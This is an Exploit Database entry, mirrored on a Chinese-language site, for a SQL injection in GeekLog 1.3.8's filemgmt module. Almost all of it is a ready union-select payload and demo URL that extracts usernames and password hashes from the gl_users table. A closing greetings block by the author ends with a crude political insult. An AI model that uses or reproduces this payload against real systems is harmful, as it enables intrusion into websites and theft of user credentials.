GeekLog 1.3.8 (filemgmt) – SQL Injection

• Exploit Database
• 178 阅读

• 作者： Gamoscu
  日期： 2010-09-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15091/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49

  GeekLog v1.3.8(filemgmt) SQL Injection Vulnerability   ###########################   Author : Gamoscu   Homepage : http://www.1923turk.com   Blog :http://gamoscu.wordpress.com/   Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8   Download:http://www.geeklog.net/filemgmt/viewcat.php?cid=8   ###########################   [ Vulnerable File ]   filemgmt/singlefile.php?lid=1 [ SQL ]   [ XpL ]   -1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--   [ Demo]   http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--   ############################################################## # # # # Baybora: http://baybora.wordpress.com/ # # Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO # # # ##Elektrikist# # # # # FREEGAZA # # #PKK ALEM SIKSIN SIZI # #############################################